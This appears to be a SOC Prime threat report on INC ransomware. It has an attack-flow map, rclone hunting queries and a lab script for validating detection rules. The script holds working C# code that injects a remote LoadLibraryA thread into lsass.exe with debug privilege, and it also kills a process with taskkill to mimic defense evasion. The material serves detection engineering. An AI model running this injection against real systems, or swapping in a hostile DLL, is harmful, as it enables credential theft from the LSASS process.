SOC Prime Bias: Critical

22 Jun 2026 13:04 UTC

From Emerging Threat to Leading Ransomware-as-a-Service: The Evolution of INC Ransomware

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

INC ransomware has grown into a major ransomware-as-a-service operation, claiming more than 800 victims since 2023. The group uses Rust-based encryptors for both Windows and Linux/ESXi systems, which increases the difficulty of malware analysis. Its operators rely on double-extortion tactics and focus on high-value sectors such as healthcare and legal services.

Investigation

The Acronis Threat Research Unit analyzed the INC intrusion chain and observed a shift toward exploiting unpatched edge devices and attacking Veeam backup servers. Technical analysis showed that the Windows payload is protected with VMProtect 3.X, while the Linux version targets VMware environments through commands such as vim-cmd. The investigation also found code similarities with related ransomware families, including Lynx and Sinobi.

Mitigation

Organizations should adopt the 3-2-1 backup strategy and ensure that backups include immutable or offline copies to support recovery. Deploying EDR or XDR with anti-tamper protections and enforcing multi-factor authentication is essential. Prioritizing patching of internet-facing applications and segmenting critical networks can also reduce the impact of a compromise.

Response

If INC ransomware activity is detected, responders should isolate affected systems immediately to halt lateral movement and stop encryption. Backup integrity should be verified before restoration begins, and incident response procedures should focus on identifying the initial access vector. Teams should also monitor for data exfiltration attempts involving tools such as rclone.
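As an added example, not taken from the original report or from the Acronis research it summarizes, the following PowerShell hunt looks for rclone activity in Sysmon telemetry on a Windows host. It assumes Sysmon is logging process creation (Event ID 1) and network connections (Event ID 3) to the default Microsoft-Windows-Sysmon/Operational channel; the 24-hour lookback, the command-line flags matched and the field-extraction helper are assumptions made for this example.

```powershell
# Added hunt (example code, not part of the SOC Prime page): rclone exfiltration
# in Sysmon telemetry. Operators frequently rename the binary, so match on
# OriginalFileName (taken by Sysmon from the PE version resource, which survives
# a rename) and on rclone's command-line shape, not only on the image name.
$Since = (Get-Date).AddHours(-24)   # lookback window (assumption, adjust as needed)
$SysmonLog = 'Microsoft-Windows-Sysmon/Operational'

# Pull a named EventData field out of a Sysmon event via its XML rendering.
function Get-SysmonField([System.Diagnostics.Eventing.Reader.EventRecord]$Event, [string]$Name) {
    ([xml]$Event.ToXml()).Event.EventData.Data |
        Where-Object { $_.Name -eq $Name } |
        Select-Object -ExpandProperty '#text'
}

# Candidate processes: true rclone binaries under any name, or a command line that
# uses rclone's copy/sync/move verbs together with its typical transfer flags.
$RcloneProcs = @(Get-WinEvent -FilterHashtable @{ LogName = $SysmonLog; Id = 1; StartTime = $Since } -ErrorAction SilentlyContinue |
    Where-Object {
        (Get-SysmonField $_ 'OriginalFileName') -eq 'rclone.exe' -or
        (Get-SysmonField $_ 'CommandLine') -match '\s(copy|sync|move)\s.*(--config|--transfers|--progress|--no-check-certificate|--ignore-existing)'
    })

if ($RcloneProcs.Count -eq 0) {
    Write-Host "[*] No rclone-like process creations in the last 24h."
}

foreach ($p in $RcloneProcs) {
    $guid = Get-SysmonField $p 'ProcessGuid'
    Write-Host ("[!] {0}  {1}`n    User: {2}`n    Cmd : {3}" -f $p.TimeCreated,
        (Get-SysmonField $p 'Image'), (Get-SysmonField $p 'User'), (Get-SysmonField $p 'CommandLine'))

    # Where did it talk to? Event 3 shares the ProcessGuid with the Event 1 that
    # spawned the process. This scans every Event 3 after the process start, which
    # is fine for a hunt on one host but should be a joined query at SIEM scale.
    $conns = @(Get-WinEvent -FilterHashtable @{ LogName = $SysmonLog; Id = 3; StartTime = $p.TimeCreated } -ErrorAction SilentlyContinue |
        Where-Object { (Get-SysmonField $_ 'ProcessGuid') -eq $guid })
    foreach ($c in $conns) {
        "    -> {0}:{1} ({2})" -f (Get-SysmonField $c 'DestinationIp'),
            (Get-SysmonField $c 'DestinationPort'), (Get-SysmonField $c 'DestinationHostname')
    }
}
```

A hit on OriginalFileName with an Image that is not rclone.exe is the strongest signal, since it means the binary was renamed; destinations that resolve to consumer cloud storage providers are the exfiltration channel the Attack Flow above describes under T1567.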

Attack Flow

    graph TB
    %% Class Definitions Section
    classDef initial_access fill:#99ccff
    classDef discovery fill:#ccffcc
    classDef credential_access fill:#ffff99
    classDef lateral_movement fill:#ffcc99
    classDef defense_impairment fill:#ff9999
    classDef command_control fill:#cc99ff
    classDef collection fill:#99ffff
    classDef exfiltration fill:#ff99cc
    classDef impact fill:#ff6666

    %% Initial Access Nodes
    node_phishing["<b>Action</b> – <b>T1566 Phishing</b><br/>Description: Spearphishing used for initial entry.<br/><b>Target</b>: Users via email."]
    class node_phishing initial_access
    node_valid_accounts["<b>Action</b> – <b>T1078 Valid Accounts</b><br/>Description: Use of accounts obtained from Initial Access Brokers.<br/><b>Target</b>: Legitimate credentials."]
    class node_valid_accounts initial_access
    node_exploit_app["<b>Action</b> – <b>T1190 Exploit Public-Facing Application</b><br/>Description: Exploiting vulnerabilities in Citrix and Fortinet.<br/><b>Target</b>: Publicly accessible services."]
    class node_exploit_app initial_access

    %% Discovery Nodes
    node_discovery["<b>Action</b> – <b>T1087/T1046 Discovery</b><br/>Description: Network and system discovery.<br/><b>Tools</b>: ping, net, Advanced IP Scanner, netscan."]
    class node_discovery discovery

    %% Credential Access Nodes
    node_credential_dump["<b>Action</b> – <b>T1003 OS Credential Dumping</b><br/>Description: Targeting Veeam backup deployments.<br/><b>Tool</b>: Modified Veeam credential dumper PowerShell script.<br/><b>Method</b>: Salted DPAPI decryption."]
    class node_credential_dump credential_access

    %% Lateral Movement Nodes
    node_lateral_movement["<b>Action</b> – <b>T1021/T1570 Lateral Movement</b><br/>Description: Moving through the network.<br/><b>Tools</b>: RDP, PsExec."]
    class node_lateral_movement lateral_movement

    %% Defense Impairment Nodes
    node_defense_impairment["<b>Action</b> – <b>T1562 Impair Defenses</b><br/>Description: Disabling or modifying security tools.<br/><b>Tool</b>: PsKill or custom process terminators.<br/><b>Target</b>: EDR and security processes."]
    class node_defense_impairment defense_impairment

    %% Command and Control Nodes
    node_c2["<b>Action</b> – <b>T1219/T1071 Command and Control</b><br/>Description: Maintaining communication.<br/><b>Tools</b>: Cobalt Strike, AnyDesk, TeamViewer.<br/><b>Note</b>: Blends into legitimate IT traffic."]
    class node_c2 command_control

    %% Collection and Exfiltration Nodes
    node_collection["<b>Action</b> – <b>T1560 Archive Collected Data</b><br/>Description: Staging and compressing data.<br/><b>Tool</b>: 7-Zip.<br/><b>Method</b>: Password-protected archives."]
    class node_collection collection
    node_exfiltration["<b>Action</b> – <b>T1567 Exfiltration Over Web Service</b><br/>Description: Uploading stolen data to cloud storage.<br/><b>Tool</b>: rclone."]
    class node_exfiltration exfiltration

    %% Impact Nodes
    node_impact["<b>Action</b> – <b>T1486 Data Encrypted for Impact</b><br/>Description: Encrypting files with .INC extension.<br/><b>Malware</b>: Rust-based Windows and Linux/ESXi encryptors.<br/><b>Encryption</b>: AES/Curve25519."]
    class node_impact impact

    %% Connection Flow
    node_phishing -->|leads_to| node_discovery
    node_valid_accounts -->|leads_to| node_discovery
    node_exploit_app -->|leads_to| node_discovery
    node_discovery -->|triggers| node_credential_dump
    node_credential_dump -->|enables| node_lateral_movement
    node_lateral_movement -->|leads_to| node_defense_impairment
    node_defense_impairment -->|allows| node_c2
    node_c2 -->|facilitates| node_collection
    node_collection -->|prepares for| node_exfiltration
    node_exfiltration -->|precedes| node_impact

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary intends to dump credentials from the Local Security Authority Subsystem Service (lsass.exe). To avoid detection by endpoint security, they first terminate a security-related process with taskkill.exe to disrupt monitoring; the simulation kills a benign stand-in process rather than a real agent, which is enough to produce the process-termination telemetry. They then create a remote thread inside lsass.exe to run code in its memory space. This direct approach is intended to trigger the rule's two selections: taskkill.exe-driven process termination and remote thread creation targeting lsass.exe.

  • Regression Test Script:

    # Simulation Script for Detection Validation
    # Run from an elevated PowerShell session on a lab host with Sysmon installed and
    # "Audit Process Termination" enabled. Do not run against production lsass.exe.

    # Step 1: Trigger selection_termination (Security EventID 4689)
    # A benign process stands in for the security tool. notepad.exe is used instead
    # of calc.exe: on Windows 10/11 calc.exe is a stub that launches the UWP
    # Calculator app and exits, so "taskkill /IM calc.exe" finds nothing to kill.
    Write-Host "[*] Triggering Process Termination via taskkill..."
    Start-Process notepad.exe
    Start-Sleep -Seconds 1
    taskkill /F /IM notepad.exe

    # Step 2: Trigger selection_remote_thread (Sysmon EventID 8, TargetImage lsass.exe)
    # Requires administrative privileges; SeDebugPrivilege is enabled below. If LSA
    # protection (RunAsPPL) or Credential Guard is on, OpenProcess fails with
    # ERROR_ACCESS_DENIED (5), which is itself a useful check of that control.
    Write-Host "[*] Attempting Remote Thread Injection into lsass.exe..."
    $DllPath     = "C:\Windows\System32\user32.dll"   # benign, Microsoft-signed system DLL
    $ProcessName = "lsass"

    # P/Invoke wrapper for the classic LoadLibraryA remote-thread pattern:
    # OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread.
    # Sysmon's CreateRemoteThread hook records this as Event ID 8 with
    # StartModule kernel32.dll and StartFunction LoadLibraryA.
    $Code = @'
    using System;
    using System.Runtime.InteropServices;
    public class Injector {
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetModuleHandle(string lpModuleName);
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern bool CloseHandle(IntPtr hObject);

        // Returns 0 on success, otherwise the Win32 error code of the failing call.
        public static int Run(int pid, string dllPath) {
            const int  PROCESS_ALL_ACCESS = 0x001F0FFF;
            const uint MEM_COMMIT_RESERVE = 0x3000;   // MEM_COMMIT | MEM_RESERVE
            const uint PAGE_READWRITE     = 0x04;

            IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
            if (hProcess == IntPtr.Zero) return Marshal.GetLastWin32Error();

            // Write the NUL-terminated DLL path into the target for LoadLibraryA to read.
            byte[] path = System.Text.Encoding.ASCII.GetBytes(dllPath + "\0");
            IntPtr remote = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)path.Length, MEM_COMMIT_RESERVE, PAGE_READWRITE);
            if (remote == IntPtr.Zero) { int e = Marshal.GetLastWin32Error(); CloseHandle(hProcess); return e; }
            IntPtr written;
            if (!WriteProcessMemory(hProcess, remote, path, (uint)path.Length, out written)) { int e = Marshal.GetLastWin32Error(); CloseHandle(hProcess); return e; }

            // kernel32.dll is mapped at the same base in every process for a given boot,
            // so the local address of LoadLibraryA is valid inside the target too.
            IntPtr loadLibrary = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
            IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLibrary, remote, 0, IntPtr.Zero);
            int result = (hThread == IntPtr.Zero) ? Marshal.GetLastWin32Error() : 0;
            if (hThread != IntPtr.Zero) CloseHandle(hThread);
            CloseHandle(hProcess);
            return result;
        }
    }
    '@

    $TargetProcess = Get-Process $ProcessName -ErrorAction SilentlyContinue
    if ($TargetProcess) {
        # Compile once per session; Add-Type refuses to redefine an existing type.
        if (-not ([System.Management.Automation.PSTypeName]'Injector').Type) {
            Add-Type -TypeDefinition $Code
        }
        # Enable SeDebugPrivilege on this process so OpenProcess can reach lsass.
        try { [System.Diagnostics.Process]::EnterDebugMode() } catch { Write-Warning "[-] Could not enable SeDebugPrivilege: $_" }

        $Result = [Injector]::Run($TargetProcess.Id, $DllPath)
        if ($Result -eq 0) {
            Write-Host "[+] Remote thread created in lsass.exe (PID $($TargetProcess.Id)); expect Sysmon Event ID 8 with StartFunction LoadLibraryA."
        } else {
            Write-Warning "[-] Injection failed with Win32 error $Result (5 = access denied, typical when RunAsPPL is enabled)."
        }
    } else {
        Write-Error "[-] Could not find lsass.exe"
    }
  • Cleanup Commands:

    # Cleanup: Ensure no stray stand-in processes are left running. The remote thread
    # returns as soon as LoadLibraryA does, so nothing needs to be undone in lsass.exe.
    Stop-Process -Name "notepad", "calc" -ErrorAction SilentlyContinue
    Write-Host "[+] Cleanup complete."
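To confirm that the simulation actually produced the telemetry the rule keys on, the following added check (example code, not part of the page's own regression script) queries the local event logs for the two selections. It assumes Sysmon writes to Microsoft-Windows-Sysmon/Operational with CreateRemoteThread logging enabled for lsass.exe, that "Audit Process Termination" is on, and that the stand-in process was notepad.exe or calc.exe; the ten-minute lookback is an assumption.

```powershell
# Added telemetry check (example, not from the original page): did both selections fire?
$Since     = (Get-Date).AddMinutes(-10)   # lookback window (assumption; cover the simulation run)
$SysmonLog = 'Microsoft-Windows-Sysmon/Operational'

# Pull a named EventData field out of an event via its XML rendering (works for
# Security and Sysmon events alike).
function Get-EventField([System.Diagnostics.Eventing.Reader.EventRecord]$Event, [string]$Name) {
    ([xml]$Event.ToXml()).Event.EventData.Data |
        Where-Object { $_.Name -eq $Name } |
        Select-Object -ExpandProperty '#text'
}

# selection_termination: Security 4689 names the terminated image in ProcessName,
# but not who killed it, so pair it with the taskkill.exe process creation.
$Terminations = @(Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4689; StartTime = $Since } -ErrorAction SilentlyContinue |
    Where-Object { (Get-EventField $_ 'ProcessName') -match '\\(notepad|calc)\.exe$' })

$TaskkillRuns = @(Get-WinEvent -FilterHashtable @{ LogName = $SysmonLog; Id = 1; StartTime = $Since } -ErrorAction SilentlyContinue |
    Where-Object { (Get-EventField $_ 'Image') -match '\\taskkill\.exe$' })

# selection_remote_thread: Sysmon 8 with lsass.exe as TargetImage. Sysmon resolves
# the start address, so a LoadLibraryA-based thread carries StartFunction as well.
$RemoteThreads = @(Get-WinEvent -FilterHashtable @{ LogName = $SysmonLog; Id = 8; StartTime = $Since } -ErrorAction SilentlyContinue |
    Where-Object { (Get-EventField $_ 'TargetImage') -match '\\lsass\.exe$' })

"Security 4689 for stand-in process : $($Terminations.Count)"
"Sysmon 1  taskkill.exe launches    : $($TaskkillRuns.Count)"
"Sysmon 8  threads into lsass.exe   : $($RemoteThreads.Count)"
foreach ($e in $RemoteThreads) {
    "    {0}  {1} -> {2}!{3}" -f $e.TimeCreated, (Get-EventField $e 'SourceImage'),
        (Get-EventField $e 'StartModule'), (Get-EventField $e 'StartFunction')
}

if ($Terminations.Count -gt 0 -and $RemoteThreads.Count -gt 0) {
    Write-Host "[+] Both selections produced telemetry; the rule should have alerted."
} elseif ($RemoteThreads.Count -eq 0) {
    Write-Warning "[-] No Sysmon 8 against lsass.exe. Check that the Sysmon config includes CreateRemoteThread for lsass, and whether RunAsPPL blocked OpenProcess."
} else {
    Write-Warning "[-] No 4689 for the stand-in. Enable it with: auditpol /set /subcategory:`"Process Termination`" /success:enable"
}
```

If the Sysmon 8 row shows a SourceImage of powershell.exe with StartFunction LoadLibraryA, the log contains exactly what the regression script was meant to generate; a rule that does not alert on it has a logic problem rather than a telemetry gap.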